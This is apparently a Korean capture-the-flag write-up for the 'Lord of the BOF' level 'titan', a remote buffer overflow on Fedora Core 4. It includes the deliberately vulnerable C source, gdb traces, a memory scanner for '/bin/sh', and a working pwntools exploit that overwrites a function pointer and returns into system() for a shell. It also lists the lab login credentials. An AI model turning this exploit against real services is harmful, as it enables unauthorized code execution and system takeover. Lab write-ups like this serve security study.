
ID | enigma

PW | let me ride




/*
        The Lord of the BOF : The Fellowship of the BOF
        - titan
        - Remote BOF on Fedora Core 4
        - hint : ? 
    - port : TCP 8888
*/
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
 
static char buffer[40];   // global copy target; main() fills it with an unbounded strcpy() from a 48-byte stack line
static void (*ftn)();     // function pointer called at the end of main(); the writeup below shows the strcpy can reach it
 
/* Default target of `ftn`: emits a placeholder line and flushes stdout
 * (presumably because stdout is a socket when the level is served remotely). */
void print()
{
        fputs("nothing here\n", stdout);
        fflush(stdout);
}
 
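/*
 * Level entry point.  Reads one line from stdin, copies it into the global
 * `buffer`, rejects a function pointer with a zero top byte, then calls `ftn`.
 *
 * Two transcription errors in the listing are repaired here so it compiles as
 * the challenge binary does: the `if` condition had lost its closing `)` (which
 * also made `==` bind before `&`), and memset() had lost its `0,` argument.
 * The buffer overflow itself is deliberate -- it is the subject of the level.
 */
int main(void)
{
        char buf[48];
        ftn = print;

        printf("titan : What a tragic mistake.\n");
        printf("you : ");
        fflush(stdout);

        // give me a food
        // fgets() stores at most 47 bytes plus a terminating NUL.
        fgets(buf,48,stdin);

        // buffer overflow!!
        // Up to 48 bytes land in the 40-byte global `buffer`; the writeup
        // shows that the overrun reaches `ftn`, which sits after it in this
        // build.  A hardened version would read straight into `buffer`
        // (`fgets(buffer, sizeof buffer, stdin)`) or use a bounded copy;
        // kept as-is because the overflow is the point of the level.
        strcpy(buffer,buf);

        // preventing RTL
        // Libc addresses on this target have a 0x00 top byte (e.g. system at
        // 0x7db0e7 below), so a pointer into libc is refused here; addresses
        // in the 0x08...... text segment pass.
        if(((int)ftn & 0xff000000) == 0)
        {
                printf("I've an allergy to NULL");
                exit(1);
        }

        // clearing buffer
        // Only `buffer` is wiped; an already-overwritten `ftn` is not restored.
        memset(buffer, 0, 40);

        ftn();
        return 0;
}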
 



fgets로 null 포함 최대 48바이트를 입력받아 strcpy로 buffer[40]에 복사하는데, 이 때 buffer 뒤에 있는 ftn까지 덮을 수 있어서 ftn을 조작할 수 있다.



esp를 증가시켜서 fgets의 ret 주소를 조작해야 한다.


(gdb) b *main+108

Breakpoint 1 at 0x8048561

(gdb) r

Starting program: /home/enigma/titan 

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0x612000

(no debugging symbols found)

(no debugging symbols found)

titan : What a tragic mistake.

you : AAAA


Breakpoint 1, 0x08048561 in main ()

(gdb) i r eax

eax            0xbf991764 -1080486044

(gdb) i r esp

esp            0xbf991740 0xbf991740

(gdb) p 0x64-0x40

$1 = 36


buf와 esp의 차이는 36바이트


fgets의 ret은 buf-40


0x0804854a <main+85>: add    esp,0x10

0x0804854d <main+88>: mov    eax,ds:0x80497e4

0x08048552 <main+93>: sub    esp,0x4

0x08048555 <main+96>: push   eax

0x08048556 <main+97>: push   0x30

0x08048558 <main+99>: lea    eax,[ebp-52]

0x0804855b <main+102>: push   eax

0x0804855c <main+103>: call   0x80483c8


fgets를 call하기 전, esp는 최종적으로 0xc만큼 증가한다.


ftn을 *main+85로 덮으면 esp를 12바이트씩 증가시킬 수 있으니


buf-40 -> buf-28 -> buf-16 -> buf-4 -> buf+8



esp를 4번 증가시켜주고, 다음 페이로드에 dummy[8] + system[4] + dummy[4] + binsh[4] 를 담아 보내면 된다.



(gdb) p system
$2 = {<text variable, no debug info>} 0x7db0e7 <system>


"/bin/sh\x00" 찾기

#include "stdio.h"
#include "string.h"
 
/* Scans memory forward from system()'s address until the 8-byte sequence
 * "/bin/sh\0" is found and prints where it was found. */
int main(void){
        /* Starting point: the address gdb reported for system() on the target. */
        const unsigned char *p = (const unsigned char *)0x7db0e7;

        /* Eight bytes: "/bin/sh" plus its terminating NUL. */
        static const char needle[] = "/bin/sh";

        /* Advance one byte at a time until the pattern matches.  The scan has
         * no upper bound; it relies on the string being mapped somewhere after
         * system(), as it is on this target. */
        while (memcmp(p, needle, sizeof needle) != 0) {
                p++;
        }

        printf("\"bin/sh\" is at 0x%lx\n", (long)p);
}
 


[enigma@Fedora_2ndFloor ~]$ vi find.c

[enigma@Fedora_2ndFloor ~]$ gcc -o find find.c 

[enigma@Fedora_2ndFloor ~]$ ./find 

"bin/sh" is at 0x8bd987


ex.py

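from pwn import *

# Target from the writeup: the titan service on TCP 8888.
# (The listing had lost the `p =` and the comma on this line.)
p = remote("192.168.0.205", 8888)

# Addresses taken from gdb (`p system`) and from find.c above.
system = 0x7db0e7
binsh = 0x8bd987

# Rounds 1-4: 40 bytes fill `buffer`, the next 4 overwrite `ftn` with
# main+85 (`add esp,0x10`), and the newline ends the fgets() line.
# Re-entering at main+85 runs fgets() again with esp 12 bytes higher
# each time, walking fgets()'s saved return address from buf-40 to buf+8
# (see the walkthrough above).  The listing had lost the parentheses here.
payload = ('A' * 40 + p32(0x804854a) + "\n") * 4

# Round 5: the line is now read onto fgets()'s own return address --
# 8 bytes of padding, system(), a dummy return address, then "/bin/sh".
payload += "A" * 8
payload += p32(system)
payload += "AAAA"
payload += p32(binsh)

print(p.recvuntil("u :"))
print(payload)
p.send(payload)

p.interactive()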
 


mandu@mandu-VirtualBox:~/ex_pwn$ python ex.py 

[+] Opening connection to 192.168.0.205 on port 8888: Done

titan : What a tragic mistake.

you :

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAA��}\x00AAAA\x87ً\x00

[*] Switching to interactive mode

 $ 

$ my-pass

euid = 503

out of the night


